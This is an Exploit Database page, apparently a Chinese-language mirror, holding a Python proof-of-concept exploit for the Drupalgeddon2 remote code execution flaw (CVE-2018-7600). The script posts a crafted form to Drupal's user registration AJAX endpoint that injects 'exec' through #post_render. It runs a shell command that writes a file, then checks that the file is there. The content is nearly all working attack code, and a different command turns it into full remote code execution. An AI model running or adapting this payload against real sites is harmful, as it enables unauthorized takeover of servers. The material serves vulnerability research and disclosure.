Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)

• Exploit Database
• 12 阅读

• 作者： Vitalii Rudnykh
  日期： 2018-04-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44448/

• #!/usr/bin/env
  import sys
  import requests
  
  print ('################################################################')
  print ('# Proof-Of-Concept for CVE-2018-7600')
  print ('# by Vitalii Rudnykh')
  print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
  print ('# https://github.com/a2u/CVE-2018-7600')
  print ('################################################################')
  print ('Provided only for educational or information purposes\n')
  
  target = input('Enter target url (example: https://domain.ltd/): ')
  
  # Add proxy support (eg. BURP to analyze HTTP(s) traffic)
  # set verify = False if your proxy certificate is self signed
  # remember to set proxies both for http and https
  # 
  # example:
  # proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
  # verify = False
  proxies = {}
  verify = True
  
  url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
  payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
  
  r = requests.post(url, proxies=proxies, data=payload, verify=verify)
  check = requests.get(target + 'hello.txt')
  if check.status_code != 200:
  sys.exit("Not exploitable")
  print ('\nCheck: '+target+'hello.txt')